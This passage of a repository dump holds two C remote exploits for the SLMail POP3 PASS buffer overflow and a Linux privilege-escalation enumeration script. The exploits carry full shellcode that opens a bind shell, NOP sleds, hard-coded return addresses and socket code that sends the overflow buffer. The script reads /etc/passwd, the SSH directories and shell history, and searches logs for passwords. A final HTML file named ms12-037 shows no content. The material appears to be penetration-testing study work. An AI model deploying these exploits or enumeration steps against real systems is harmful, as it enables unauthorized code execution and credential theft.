"\xaf\x5c\x16\x24\xb2\x60\x3e\x21\x3b\x86\x54\x59\x6a\x11" 34 | "\xc1\xc0\x37\xe9\x70\x0c\xe2\x79\x10\x9f\x69\x79\x5f\xbc" 35 | "\x25\x2e\x08\x72\x3c\xba\xa4\x2d\x96\xd8\x34\xab\xd1\x58" 36 | "\xe3\x08\xdf\x61\x66\x34\xfb\x71\xbe\xb5\x47\x25\x6e\xe0" 37 | "\x11\x93\xc8\x5a\xd0\x4d\x83\x31\xba\x19\x52\x7a\x7d\x5f" 38 | "\x5b\x57\x0b\xbf\xea\x0e\x4a\xc0\xc3\xc6\x5a\xb9\x39\x77" 39 | "\xa4\x10\xfa\x97\x47\xb0\xf7\x3f\xde\x51\xba\x5d\xe1\x8c" 40 | "\xf9\x5b\x62\x24\x82\x9f\x7a\x4d\x87\xe4\x3c\xbe\xf5\x75" 41 | "\xa9\xc0\xaa\x76\xf8"; 42 | 43 | struct sockaddr_in plm,lar,target; 44 | 45 | int conn(char *ip) 46 | { 47 | int sockfd; 48 | plm.sin_family = AF_INET; 49 | plm.sin_port = htons(PORT); 50 | plm.sin_addr.s_addr = inet_addr(ip); 51 | bzero(&(plm.sin_zero),8); 52 | sockfd = socket(AF_INET,SOCK_STREAM,0); 53 | if((connect(sockfd,(struct sockaddr *)&plm,sizeof(struct sockaddr))) < 0) 54 | { 55 | perror("[-] connect error!"); 56 | exit(0); 57 | } 58 | printf("[*] Connected to: %s.\n",ip); 59 | return sockfd; 60 | } 61 | 62 | int main(int argc, char *argv[]) 63 | { 64 | int xs; 65 | char out[1024]; 66 | char *off = malloc(2606); 67 | memset(off, 0x41, 2606); 68 | char *nop = malloc(8); 69 | memset(nop, 0x90, 8); 70 | strcat(off, RETADD); 71 | strcat(off, nop); 72 | strcat(off, shellcode); 73 | 74 | printf("[+] SLMAIL Remote buffer overflow exploit in POP3 PASS by Haroon Rashid Astwat.\n"); 75 | xs = conn("192.168.31.154"); 76 | read(xs, out, 1024); 77 | printf("[*] %s", out); 78 | write(xs,"USER username\r\n", 15); 79 | read(xs, out, 1024); 80 | printf("[*] %s", out); 81 | write(xs,"PASS ",5); 82 | write(xs,off,strlen(off)); 83 | printf("Shellcode len: %d bytes\n",strlen(shellcode)); 84 | printf("Buffer len: %d bytes\n",strlen(off)); 85 | write(xs,"\r\n",4); 86 | close(xs); 87 | } 88 | -------------------------------------------------------------------------------- /Seba/646_modified.c: -------------------------------------------------------------------------------- 1 | /* 2 | SLMAIL REMOTE PASSWD BOF - Ivan Ivanovic Ivanov ????-????? 3 | ???????????????? 31337 Team 4 | */ 5 | 6 | #include 7 | #include 8 | #include 9 | #include 10 | 11 | // [*] bind 4444 12 | unsigned char shellcode[] = 13 | "\xb8\xe6\x01\x8e\xd3\xda\xce\xd9\x74\x24\xf4\x5a\x29\xc9" 14 | "\xb1\x4f\x31\x42\x14\x03\x42\x14\x83\xc2\x04\x04\xf4\x72" 15 | "\x3b\x41\xf7\x8a\xbc\x31\x71\x6f\x8d\x63\xe5\xfb\xbc\xb3" 16 | "\x6d\xa9\x4c\x38\x23\x5a\xc6\x4c\xec\x6d\x6f\xfa\xca\x40" 17 | "\x70\xcb\xd2\x0f\xb2\x4a\xaf\x4d\xe7\xac\x8e\x9d\xfa\xad" 18 | "\xd7\xc0\xf5\xff\x80\x8f\xa4\xef\xa5\xd2\x74\x0e\x6a\x59" 19 | "\xc4\x68\x0f\x9e\xb1\xc2\x0e\xcf\x6a\x59\x58\xf7\x01\x05" 20 | "\x79\x06\xc5\x56\x45\x41\x62\xac\x3d\x50\xa2\xfd\xbe\x62" 21 | "\x8a\x51\x81\x4a\x07\xa8\xc5\x6d\xf8\xdf\x3d\x8e\x85\xe7" 22 | "\x85\xec\x51\x62\x18\x56\x11\xd4\xf8\x66\xf6\x82\x8b\x65" 23 | "\xb3\xc1\xd4\x69\x42\x06\x6f\x95\xcf\xa9\xa0\x1f\x8b\x8d" 24 | "\x64\x7b\x4f\xac\x3d\x21\x3e\xd1\x5e\x8d\x9f\x77\x14\x3c" 25 | "\xcb\x01\x77\x29\x38\x3f\x88\xa9\x56\x48\xfb\x9b\xf9\xe2" 26 | "\x93\x97\x72\x2c\x63\xd7\xa8\x88\xfb\x26\x53\xe8\xd2\xec" 27 | "\x07\xb8\x4c\xc4\x27\x53\x8d\xe9\xfd\xf3\xdd\x45\xae\xb3" 28 | "\x8d\x25\x1e\x5b\xc4\xa9\x41\x7b\xe7\x63\xf4\xbc\x70\x4c" 29 | "\xaf\x5c\x16\x24\xb2\x60\x3e\x21\x3b\x86\x54\x59\x6a\x11" 30 | "\xc1\xc0\x37\xe9\x70\x0c\xe2\x79\x10\x9f\x69\x79\x5f\xbc" 31 | "\x25\x2e\x08\x72\x3c\xba\xa4\x2d\x96\xd8\x34\xab\xd1\x58" 32 | "\xe3\x08\xdf\x61\x66\x34\xfb\x71\xbe\xb5\x47\x25\x6e\xe0" 33 | "\x11\x93\xc8\x5a\xd0\x4d\x83\x31\xba\x19\x52\x7a\x7d\x5f" 34 | "\x5b\x57\x0b\xbf\xea\x0e\x4a\xc0\xc3\xc6\x5a\xb9\x39\x77" 35 | "\xa4\x10\xfa\x97\x47\xb0\xf7\x3f\xde\x51\xba\x5d\xe1\x8c" 36 | "\xf9\x5b\x62\x24\x82\x9f\x7a\x4d\x87\xe4\x3c\xbe\xf5\x75" 37 | "\xa9\xc0\xaa\x76\xf8"; 38 | 39 | void exploit(int sock) { 40 | FILE *test; 41 | int *ptr; 42 | char userbuf[] = "USER madivan\r\n"; 43 | char evil[2959]; 44 | char buf[2959]; 45 | char receive[1024]; 46 | char nopsled[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"; 47 | memset(buf, 0x00, 2959); 48 | memset(evil, 0x41, 2959); 49 | ptr = &evil; 50 | // 652*4 = 2608 51 | ptr = ptr + 652; // 2608 52 | memcpy(ptr, &nopsled, 12); 53 | ptr = ptr + 3; 54 | memcpy(ptr, &shellcode, 317); 55 | // assign the return address 56 | *(long*)&evil[2606] = 0x5F4A358F; 57 | 58 | // banner 59 | recv(sock, receive, 200, 0); 60 | printf("[+] %s", receive); 61 | // user 62 | printf("[+] Sending Username...\n"); 63 | send(sock, userbuf, strlen(userbuf), 0); 64 | recv(sock, receive, 200, 0); 65 | printf("[+] %s", receive); 66 | // passwd 67 | printf("[+] Sending Evil buffer...\n"); 68 | sprintf(buf, "PASS %s\r\n", evil); 69 | //test = fopen("test.txt", "w"); 70 | //fprintf(test, "%s", buf); 71 | //fclose(test); 72 | send(sock, buf, strlen(buf), 0); 73 | printf("[*] Done! Connect to the host on port 9876...\n\n"); 74 | } 75 | 76 | int connect_target(char *host, u_short port) 77 | { 78 | int sock = 0; 79 | struct hostent *hp; 80 | WSADATA wsa; 81 | struct sockaddr_in sa; 82 | 83 | WSAStartup(MAKEWORD(2,0), &wsa); 84 | memset(&sa, 0, sizeof(sa)); 85 | 86 | hp = gethostbyname(host); 87 | if (hp == NULL) { 88 | printf("gethostbyname() error!\n"); exit(0); 89 | } 90 | printf("[+] Connecting to %s\n", host); 91 | sa.sin_family = AF_INET; 92 | sa.sin_port = htons(port); 93 | sa.sin_addr = **((struct in_addr **) hp->h_addr_list); 94 | 95 | sock = socket(AF_INET, SOCK_STREAM, 0); 96 | if (sock < 0) { 97 | printf("[-] socket blah?\n"); 98 | exit(0); 99 | } 100 | if (connect(sock, (struct sockaddr *) &sa, sizeof(sa)) < 0) 101 | {printf("[-] connect() blah!\n"); 102 | exit(0); 103 | } 104 | printf("[+] Connected to %s\n", host); 105 | return sock; 106 | } 107 | 108 | 109 | int main(int argc, char **argv) 110 | { 111 | int sock = 0; 112 | int data, port; 113 | printf("\n[$] SLMail Server POP3 PASSWD Buffer Overflow exploit\n"); 114 | printf("[$] by Mad Ivan [ void31337 team ] - http://exploit.void31337.ru\n\n"); 115 | if ( argc < 2 ) { printf("usage: slmail-ex.exe \n\n"); exit(0); } 116 | port = 110; 117 | sock = connect_target(argv[1], port); 118 | exploit(sock); 119 | closesocket(sock); 120 | return 0; 121 | } 122 | -------------------------------------------------------------------------------- /Seba/linux_priv_esc_enum.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | #tool that provides common enumeration when you try a privilege escalation on linux 4 | 5 | #OS info enumeration 6 | 7 | #function that show the title of the section 8 | # 9 | #$1 =title of the section (es: system Info) 10 | echo_title(){ 11 | echo -e "\e[00;33m### $1 ##############################################\e[00m" 12 | echo -e "\n" 13 | } 14 | 15 | 16 | #function that show the given command in a proper format 17 | # 18 | #$1 = short description of the command 19 | #$2 = comand itself 20 | echo_command(){ 21 | echo -e "\e[1;33m$1: \n\e[\033[1;0m" 22 | eval $2 23 | echo -e "\n" 24 | } 25 | 26 | #function that cicle for each command in the given array and execute the commands 27 | # 28 | #$1 = array of title => commands 29 | run_section_commands(){ 30 | #create a new array from the arguent 31 | eval "declare -A arg_array="${1#*=} 32 | #execute comand 33 | for key in "${!arg_array[@]}"; do 34 | echo_command $key "${arg_array[$key]}" 35 | done 36 | } 37 | 38 | #enumerate system info 39 | declare -A SYSTEM_INFO=( 40 | ["ALL"]="uname -a" 41 | ["KERNEL_RELEASE"]="uname -r" 42 | ["HOSTNAME"]="hostname" 43 | ["ARCH"]="uname -m" 44 | ["KERNEL_INFO"]="cat /proc/version" 45 | ["DISTRO_INFO"]="cat /etc/issue" 46 | ) 47 | 48 | #enumerate infos about users and groups on the system 49 | declare -A USER_GROUP=( 50 | ["ALL_USERS"]="cat /etc/passwd" 51 | ["ALL_GROUPS"]="cat /etc/group" 52 | ["SUDOERS"]="grep -E ":0:" /etc/passwd" 53 | ["USER_CURRENT_LOGGED"]="w" 54 | ) 55 | 56 | #enumerate infos about current user 57 | declare -A CURRENT_USER=( 58 | ["WHOAMI"]="whoami" 59 | ["ID"]="id" 60 | ) 61 | 62 | #enumerate environment info 63 | declare -A ENV_INFO=( 64 | ["VARIABLES"]="env" 65 | ["HISTORY"]="history" 66 | ) 67 | 68 | #enumerate interesting files on the system 69 | declare -A INTERESTING_FILES_DISCOVER=( 70 | ["SUID_FILES"]="find / -perm -4000 -type f 2>/dev/null" 71 | ["WORLD_WRITABLE_FILES"]="find / ! -path "*/proc/*" -perm -2 -type f" 72 | ["WORLD_WRITABLE_DIR"]="find / -perm -2 -type d" 73 | ["ROOT_DIR_ACCESS"]="ls -ahlR /root/" 74 | ["BASH_HISTORY"]="cat ~/.bash_history" 75 | ["SSH_FILES"]="ls -la ~/.ssh/" 76 | ["LOG_FILE_WITH_PASS"]="grep -l -i pass /var/log/*.log 2>/dev/null" 77 | ["LIST_OPEN_FILES"]="lsof -i -n" 78 | ) 79 | 80 | #enumerate the processes 81 | declare -A SERVICE_INFO=( 82 | ["ROOT_PROCESS"]="ps -aux | grep root" 83 | ["IINETD_PROCESS"]="cat /etc/inetd.conf" 84 | ["XINETD_PROCESS"]="cat /etc/xinetd.conf" 85 | ) 86 | 87 | #enumerate cron jobs 88 | declare -A JOBS_INFO=( 89 | ["CRON"]="ls -la /etc/cron*" 90 | ["CRON_WRITABLE"]=" ls -aRl /etc/cron* | grep -E "w. " " 91 | ) 92 | 93 | #enumerate network info 94 | declare -A NETWORK_INFO=( 95 | ["INTERFACES"]="/sbin/ifconfig -a" 96 | ["ROUTES"]="route" 97 | ["DNS"]="cat /etc/resolv.conf" 98 | ["TCP_CONNECTION"]="netstat -ant" 99 | ["UDP_CONNECTION"]="netstat -anu" 100 | ["USED_PORT"]="cat /etc/services" 101 | ) 102 | 103 | 104 | #enumerate programs info 105 | declare -A PROGRAMS_INFO=( 106 | ["SUDO_VERSION"]="sudo -V | head -1" 107 | ["PROGRAMS_DEBIAN"]="dpkg -l" 108 | ["PROGRAMS_REDHAT"]="rpm -qa" 109 | ["COMPILERS_DECOMPILERS"]="dpkg --list 2>/dev/null| grep compiler |grep -v decompiler 2>/dev/null && yum list installed 'gcc*' 2>/dev/null| grep gcc 2>/dev/null" 110 | ) 111 | 112 | echo -e "\n\e[00;31m#########################################################\e[00m" 113 | echo -e "\e[00;31m#\e[00m" "\e[00;33m Privilege Escalation Script \e[00m" "\e[00;31m#\e[00m" 114 | echo -e "\e[00;31m#########################################################\e[00m" 115 | 116 | echo -e "\n" 117 | 118 | #enumerate the OS kernel version, the distro ecc... 119 | 120 | echo_title "SYSTEM INFO" 121 | 122 | run_section_commands "$(declare -p SYSTEM_INFO)" 123 | 124 | #enumerate the users and groups on the system and what they are doing 125 | 126 | echo_title "USERS AND GROUPS INFO" 127 | 128 | run_section_commands "$(declare -p USER_GROUP)" 129 | 130 | #enumerate the curent user info 131 | 132 | echo_title "CURRENT USER INFO" 133 | 134 | run_section_commands "$(declare -p CURRENT_USER)" 135 | 136 | #enumerate the unvironment info 137 | 138 | echo_title "ENV INFO" 139 | 140 | run_section_commands "$(declare -p ENV_INFO)" 141 | 142 | #enumerate the interesting files on the system 143 | 144 | echo_title "INTERESTING FILES" 145 | 146 | run_section_commands "$(declare -p INTERESTING_FILES_DISCOVER)" 147 | 148 | #enumerate the processes 149 | 150 | echo_title "SERVICE INFO" 151 | 152 | run_section_commands "$(declare -p SERVICE_INFO)" 153 | 154 | #enumerate cron jobs 155 | 156 | echo_title "CRON INFO" 157 | 158 | run_section_commands "$(declare -p JOBS_INFO)" 159 | 160 | #enumerate cron jobs 161 | 162 | echo_title "NETWORK INFO" 163 | 164 | run_section_commands "$(declare -p NETWORK_INFO)" 165 | 166 | #enumerate cron jobs 167 | 168 | echo_title "PROGRAMS INFO" 169 | 170 | run_section_commands "$(declare -p PROGRAMS_INFO)" 171 | 172 | 173 | -------------------------------------------------------------------------------- /Seba/ms12-037-2.html: -------------------------------------------------------------------------------- 1 | 22 | 23 | 24 | 25 |
26 |  
27 | 232 | 233 | 234 | --------------------------------------------------------------------------------